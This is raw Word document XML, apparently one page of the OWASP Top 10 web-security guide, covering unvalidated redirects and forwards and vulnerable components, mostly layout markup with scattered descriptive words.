    <w:p w14:paraId="2FA3E431" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D75F0BC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="410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70A13A54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</w:p>
    <w:p w14:paraId="7447A724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oo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mponen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actice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oject</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE40F61" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772EED74" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="40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5E5866A9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h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Unfortunat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al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secu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0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Libraries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0067546A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pe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ourc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oftwa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</w:p>
    <w:p w14:paraId="171E1305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ddressin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cern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pe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1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ourc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mponents</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77CC563F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IT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mm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ulnerabilitie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n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xposures</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75159644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xampl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as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ssignmen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2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ulnerabil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ha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wa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fixed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in</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5832A9F6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId634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ctiveRecord,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6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uby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7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8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ail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39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EM</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AAF1491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19B4BC1F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="16"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="45A1A2A4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="241"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5D518D39">
          <v:shape id="_x0000_s2290" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.65pt;width:570pt;height:229.7pt;z-index:251693568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00"/>
                    <w:gridCol w:w="1800"/>
                    <w:gridCol w:w="1800"/>
                    <w:gridCol w:w="1800"/>
                    <w:gridCol w:w="1800"/>
                    <w:gridCol w:w="1800"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00C534F5" w14:paraId="7CAF4933" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1026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253ED21C" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="788" w:lineRule="exact"/>
                          <w:ind w:left="64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760F5183" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="161" w:lineRule="exact"/>
                          <w:ind w:left="62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44B70A85" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="511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3D1B7AF1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="56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6248353B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="522" w:lineRule="exact"/>
                          <w:ind w:left="151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072F15CB" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="148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3463BBCD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="563" w:lineRule="exact"/>
                          <w:ind w:left="54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71288402" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="62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3A5D2714" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="510" w:lineRule="exact"/>
                          <w:ind w:left="60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22B108E7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="63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21A92A13" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="62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B982E13" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="429" w:lineRule="exact"/>
                          <w:ind w:left="87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Specific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482C752E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309" w:lineRule="exact"/>
                          <w:ind w:left="3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6C983D4D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="50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FF00"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="277499C7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309" w:lineRule="exact"/>
                          <w:ind w:left="4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3F3C22DD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="34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UNCOMMON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01123B46" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309" w:lineRule="exact"/>
                          <w:ind w:left="36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3378AEBE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="69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37D47F59" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309" w:lineRule="exact"/>
                          <w:ind w:left="6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6E2653E1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="42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F6CDF77" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309" w:lineRule="exact"/>
                          <w:ind w:left="36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pplication /</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1EC5B478" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="20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Business Specific</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00C534F5" w14:paraId="1F490D1D" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="2344"/>
                    </w:trPr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1BFE381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one</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6987CC70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ic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19BAD934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o</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="302B64AD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bmit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0BC210F3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ques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2F10F46C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site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y</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="387DAB47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ebsit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ther</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="482086AE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TM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e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at</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="22DB8A6B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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5B59F01A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ul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i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245D0F5B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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ink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2122DDD8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validat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direct</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="51A55B65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ick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s</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4FB006CF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lick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.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2F021A3A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ore</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7EB4F38A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="200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ike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lic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t,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7EEFF87B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nc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in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571C708E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i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te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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7916EABF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rge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safe</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7F38A88E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="202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war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ypass</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3BA74380" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
                          <w:ind w:left="72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curit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hecks.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="360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AD55F57" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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pplication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requent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direc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</w:p>
                      <w:p w14:paraId="06B75E48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th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s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r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ward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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="43A8A32F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imila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nner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ometime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rget</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3789104D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pecifi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validated</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="204325BA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rameter,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ow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hoose</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4B0B1C8C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stinatio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.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="045307BF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="32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etect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check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direc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easy.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="005CD88C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Look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direc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e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04EC2225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l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RL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check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ward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harder,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="71E68A28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ecaus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arge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rnal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ge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344F08E5" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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uch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direct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y</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5714FD26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emp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o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stall</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5B409157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lwar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ick</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="57149E15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ictim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o</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4D015F8C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disclosing</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="48BB687B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="200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password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ther</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="58A422BB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sensitive</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2BD536ED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formation.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nsafe</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2DA8F784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orward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llow</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="462C5F7D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="202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trol</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2F5824C3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
                          <w:ind w:left="73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ypass.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3872B53" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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onsider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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5395EADD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usin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value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f</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="396006B6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retaining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your</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="33EE5992" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="20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users’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rust.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="59EF0DA1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="320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the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get</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="42EAC04A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wned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b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malware?</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="42DFB8D0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="322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What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f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ttackers</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1BC1ECEA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can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access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internal</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="79AA8F51" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
                          <w:ind w:left="74"/>
                        </w:pP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only</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                            <w:noProof/>
                            <w:color w:val="000000"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="19"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                            <w:noProof/>
                            <w:color w:val="323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="19"/>
                          </w:rPr>
                          <w:t>functions?</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="5088E095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1CA3A03F">
          <v:shape id="imagerId640" o:spid="_x0000_s2289" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:134pt;height:96pt;z-index:-251761152;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId640" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4C4750E0">
          <v:shape id="imagerId641" o:spid="_x0000_s2288" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251760128;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId641" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="66F67FDC">
          <v:shape id="imagerId642" o:spid="_x0000_s2287" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251759104;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId642" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1993F6A3">
          <v:shape id="imagerId643" o:spid="_x0000_s2286" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251753984;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId643" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5C698B47">
          <v:shape id="imagerId644" o:spid="_x0000_s2285" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251752960;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId644" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5811083F">
          <v:shape id="imagerId645" o:spid="_x0000_s2284" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251758080;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId645" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2076307B">
          <v:shape id="imagerId646" o:spid="_x0000_s2283" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251757056;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId646" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="712E9F1F">
          <v:shape id="imagerId647" o:spid="_x0000_s2282" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251756032;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId647" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="249B4A32">
          <v:shape id="imagerId648" o:spid="_x0000_s2281" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251755008;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId648" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="747A2339">
          <v:shapetype id="_x0000_m2280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A6315B">
          <v:shape id="_x0000_s2279" type="#_x0000_m2280" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25177446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EC0160C">
          <v:shapetype id="_x0000_m2278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A1AA7B9">
          <v:shape id="_x0000_s2277" type="#_x0000_m2278" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.5pt;width:543pt;height:3pt;z-index:25169459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BA1241F">
          <v:shapetype id="_x0000_m2276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FF390C7">
          <v:shape id="_x0000_s2275" type="#_x0000_m2276" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.7pt;width:543pt;height:3pt;z-index:25169561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2E060221">
          <v:shapetype id="_x0000_m2274" coordsize="600,20571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78C6BAE">
          <v:shape id="_x0000_s2273" type="#_x0000_m2274" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.65pt;width:6pt;height:205.7pt;z-index:25169664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210BB4D3">
          <v:shapetype id="_x0000_m2272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24C87C">
          <v:shape id="_x0000_s2271" type="#_x0000_m2272" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.15pt;width:543pt;height:3pt;z-index:25169766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732C21F9">
          <v:shapetype id="_x0000_m2270" coordsize="54300,3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F2040FE">
          <v:shape id="_x0000_s2269" type="#_x0000_m2270" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:272.9pt;width:543pt;height:3pt;z-index:25169868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136A5413">
          <v:shapetype id="_x0000_m2268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2823DB">
          <v:shape id="_x0000_s2267" type="#_x0000_m2268" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25177344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2BF48949">
          <v:shapetype id="polygon151" o:spid="_x0000_m2266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F4391C1">
          <v:shape id="WS_polygon151" o:spid="_x0000_s2265" type="#polygon151" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25177241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3E3B89F5">
          <v:shapetype id="polygon152" o:spid="_x0000_m2264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D28449D">
          <v:shape id="WS_polygon152" o:spid="_x0000_s2263" type="#polygon152" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251771392;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5CDCEEE2">
          <v:shapetype id="_x0000_m2262" coordsize="26640,215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2C5489E">
          <v:shape id="_x0000_s2261" type="#_x0000_m2262" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-251770368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057F9A30">
          <v:shapetype id="_x0000_m2260" coordsize="1366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B4ACD2D">
          <v:shape id="_x0000_s2259" type="#_x0000_m2260" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:136.65pt;height:.6pt;z-index:-25176934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FADF17E">
          <v:shapetype id="_x0000_m2258" coordsize="228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F1646D0">
          <v:shape id="_x0000_s2257" type="#_x0000_m2258" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:574.2pt;width:228.7pt;height:.55pt;z-index:-25176832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4A783CF">
          <v:shapetype id="_x0000_m2256" coordsize="137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788BC4">
          <v:shape id="_x0000_s2255" type="#_x0000_m2256" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:622.2pt;width:137.5pt;height:.55pt;z-index:-25176729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096C9E1">
          <v:shapetype id="_x0000_m2254" coordsize="1566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3CB70E4">
          <v:shape id="_x0000_s2253" type="#_x0000_m2254" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:638.15pt;width:156.6pt;height:.6pt;z-index:-2517662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EB69E7E">
          <v:shapetype id="_x0000_m2252" coordsize="2108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EEB0793">
          <v:shape id="_x0000_s2251" type="#_x0000_m2252" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:654.2pt;width:210.8pt;height:.6pt;z-index:-2517652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98E72A5">
          <v:shapetype id="_x0000_m2250" coordsize="2454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8D11D2C">
          <v:shape id="_x0000_s2249" type="#_x0000_m2250" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:670.2pt;width:245.4pt;height:.55pt;z-index:-2517642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9591D4B">
          <v:shapetype id="_x0000_m2248" coordsize="21600,21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AC586D6">
          <v:shape id="_x0000_s2247" type="#_x0000_m2248" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-251763200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6D2893E">
          <v:shapetype id="_x0000_m2246" coordsize="26840,218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5E816FF">
          <v:shape id="_x0000_s2245" type="#_x0000_m2246" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251762176;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2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A10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E93BF4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="731" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unvalidated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Redirects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and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ADD954" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="600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Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277559D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771C49AA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1342F29A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A61AA88" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD7D9CD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CB88BA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7949400D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2B35ED" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C07AAC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112EED75" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5058543B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A43426" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2171720B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
